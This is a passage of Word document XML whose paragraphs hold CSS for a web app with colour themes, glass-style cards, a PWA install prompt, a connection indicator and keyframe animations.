    <w:p w14:paraId="39B4CE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--accent-secondary: var(--enterprise-green);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860E2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--accent-tertiary: var(--quantum-purple);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE6D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--border-glow: rgba(244, 208, 63, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB36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--shadow-glow: 0 0 30px rgba(244, 208, 63, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CAEE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--particles-color: #F4D03F;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FA5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12BCD22" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286958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CORPORATE VOID THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EE8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.theme-corporate-void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA222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--bg-primary: linear-gradient(135deg, var(--deep-space) 0%, #1a0033 50%, #330066 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760889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--bg-card: rgba(108, 52, 131, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409973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--bg-secondary: rgba(156, 39, 176, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC4C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--text-primary: #e1bee7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0CB9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--text-secondary: #ba68c8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664797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--accent-primary: var(--quantum-purple);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B97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--accent-secondary: #9c27b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37B5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--accent-tertiary: #673ab7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C70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--border-glow: rgba(108, 52, 131, 0.5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A7A6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--shadow-glow: 0 0 40px rgba(156, 39, 176, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0C1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--particles-color: #9c27b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CDE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4BE6F1E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B992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ENTERPRISE AZURE THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22272F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.theme-enterprise-azure {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545876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--bg-primary: linear-gradient(135deg, #1a237e 0%, #283593 50%, #3f51b5 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CD18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--bg-card: rgba(31, 97, 141, 0.25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742D6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--bg-secondary: rgba(63, 81, 181, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A375C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--text-primary: #e8eaf6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6A8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--text-secondary: #9fa8da;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B993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--accent-primary: var(--quantum-blue);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F513F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--accent-secondary: #3f51b5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB3D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--accent-tertiary: #2196f3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E3A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--border-glow: rgba(31, 97, 141, 0.4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDBA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--shadow-glow: 0 0 35px rgba(63, 81, 181, 0.25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B9C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--particles-color: #2196f3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C13A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AE6DBDD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658D8E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QUANTUM MATRIX THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290FC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.theme-quantum-matrix {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2ABC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--bg-primary: linear-gradient(135deg, #004d40 0%, #00695c 50%, #00796b 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B02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--bg-card: rgba(46, 204, 113, 0.15);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ABD4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--bg-secondary: rgba(0, 245, 255, 0.08);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F654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--text-primary: #e0f2f1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CE5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--text-secondary: #80cbc4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BB8D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--accent-primary: var(--enterprise-green);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601DD1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--accent-secondary: #00f5ff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0AB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--accent-tertiary: #1de9b6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E31E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--border-glow: rgba(46, 204, 113, 0.4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523A5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--shadow-glow: 0 0 30px rgba(0, 245, 255, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0384A5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--particles-color: #00f5ff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D137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F3B781E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277C26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PLATINUM EXECUTIVE THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D977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.theme-platinum-executive {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D623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--bg-primary: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 50%, #667eea 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A52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--bg-card: rgba(255, 255, 255, 0.8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A690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--bg-secondary: rgba(102, 126, 234, 0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FE98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--text-primary: var(--corporate-dark);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F27CC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--text-secondary: #546e7a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D484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--accent-primary: var(--quantum-purple);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA71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--accent-secondary: var(--quantum-blue);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0F3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--accent-tertiary: var(--quantum-gold);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAD7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--border-glow: rgba(108, 52, 131, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8581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--shadow-glow: 0 0 25px rgba(31, 97, 141, 0.15);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB51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--particles-color: #667eea;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32AD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F497A82" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00ED9E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GLOBAL STYLES === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ED17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* {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4F2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margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6BB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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B1D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box-sizing: border-box;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F61F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-webkit-tap-highlight-color: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522306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4C230DF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D9A1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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601362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font-family: 'Inter', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B15C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var(--bg-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4930EF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color: var(--text-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755AC6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overflow-x: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366ECA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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A69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/* Safe Area Support */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C236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env(safe-area-inset-top) env(safe-area-inset-right) env(safe-area-inset-bottom) env(safe-area-inset-left);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA15D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/* PDF Optimization */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329784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print-color-adjust: exact;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B731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-webkit-print-color-adjust: exact;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0C2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0960E2B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AA76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.orbitron {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618BB9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font-family: 'Orbitron', monospace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485698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D159B59" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F57B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PWA INSTALL PROMPT === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E12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.install-prompt {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F32AF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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76795A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bottom: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E9D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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70CA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right: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E071B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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C12E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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F5C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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73033F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15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB644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15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C15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1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60639C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translateY(100px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687665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opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2111C1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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147C5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96B0E1F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B09A1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.install-prompt.show {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9282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translateY(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A01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opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153B21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87FD3DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEF5B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CONNECTION STATUS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9794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.connection-status {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A03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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9C0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top: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004440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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E08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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0966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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE4A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gap: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4361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8px 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7D4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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AADBD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backdrop-filter: blur(10px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364275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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE17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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D14E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999;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE2E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font-size: 14px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3098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min-height: 44px; /* Touch target */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48E5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AA4018D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DC34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.status-dot {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACA4D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8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E095F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8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AD62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50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3AA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#ff4444;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E0B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animation: pulse 2s infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6117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0DEA880" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F2F7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.status-dot.connected {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDF6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#44ff44;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F437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BEFF0F7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFC23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PARTICLES CONTAINER === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E5E6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#particles-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE1C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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F586E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top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E84FB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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3C9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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254C5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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EAC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pointer-events: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91CE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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA88B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F0BFD1F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FA97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MAIN CONTAINER === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D85AD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.main-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C701E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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344EBD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10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC825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2rem 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585739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max-width: 1400px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254497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margin: 0 auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536560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326188C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17889A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GLASS MORPHISM === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A29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.glass-card {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570AC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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA301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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D41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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F07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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D14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box-shadow: var(--shadow-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09F1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all 0.4s cubic-bezier(0.23, 1, 0.320, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484BD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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337762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overflow: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A98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/* Touch optimization */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F95A5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touch-action: manipulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B02B6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20F958D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE900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.glass-card::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D2F2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content: '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB56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absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021406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top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E41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-100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362A16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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BDE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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC7F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linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.1), transparent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ADB6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left 0.8s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1045E1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3D922D1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C19A8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.glass-card:hover::before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6625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.glass-card:active::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC29E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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157A6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AA3924C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503042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3D CARD TRANSFORMATIONS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668560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.card-3d {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8BB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transform-style: preserve-3d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6AC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transform 0.6s cubic-bezier(0.23, 1, 0.320, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB6E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9B8E015" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247969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.card-3d:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5FF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.card-3d:active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5DF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rotateX(5deg) rotateY(5deg) scale(1.02);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA93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100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581E5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35370EF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13206F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QUANTUM COUNTER === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50DA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.quantum-counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1C0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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD708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text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D8D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3rem 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17D2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margin-bottom: 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C042C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739CE70" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB162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.quantum-counter::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316CB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content: '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C766A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absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D652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top: -50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D00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-50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B051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200%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783A4F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200%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010C8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conic-gradient(from 0deg, transparent, var(--accent-primary), transparent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDEC5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animation: rotate-glow 4s linear infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EE9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-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA1D5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50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F37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18E1E68" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643133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.quantum-counter-number {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FC1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font-family: 'Orbitron', monospace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB8B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font-size: clamp(2rem, 8vw, 4rem);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2643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font-weight: 900;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE8E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linear-gradient(45deg, var(--accent-primary), var(--accent-secondary), var(--accent-tertiary));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3CF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background-size: 300% 300%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD2E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-webkit-background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C42A9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-webkit-text-fill-color: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F81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background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCDD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animation: gradient-shift 3s ease-in-out infinite, pulse-glow 2s ease-in-out infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C18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text-shadow: 0 0 30px var(--accent-secondary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222F6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2611112" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D8B9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ANIMATIONS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560AF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@keyframes rotate-glow {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79269C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0% { transform: rotate(0deg); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5945D3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100% { transform: rotate(360deg); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF91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9DF8406" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED89D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@keyframes gradient-shift {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57265C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0%, 100% { background-position: 0% 50%; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A552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50% { background-position: 100% 50%; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62564B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39295F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499027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@keyframes pulse-glow {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3ED2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0%, 100% { filter: brightness(1); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DD2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50% { filter: brightness(1.2); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1362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8B8B341" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C1C4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@keyframes pulse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049CD8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0%, 100% { opacity: 1; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E9A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50% { opacity: 0.5; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011184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81F070E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795E72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@keyframes float {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37515E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0%, 100% { transform: translateY(0px); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A11A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50% { transform: translateY(-10px); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76E7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EA586B2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F2D1B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@keyframes glow-pulse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B56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0%, 100% { box-shadow: var(--shadow-glow); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A39E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50% { box-shadow: 0 0 40px var(--accent-primary); }</w:t>
      </w:r>
    </w:p>
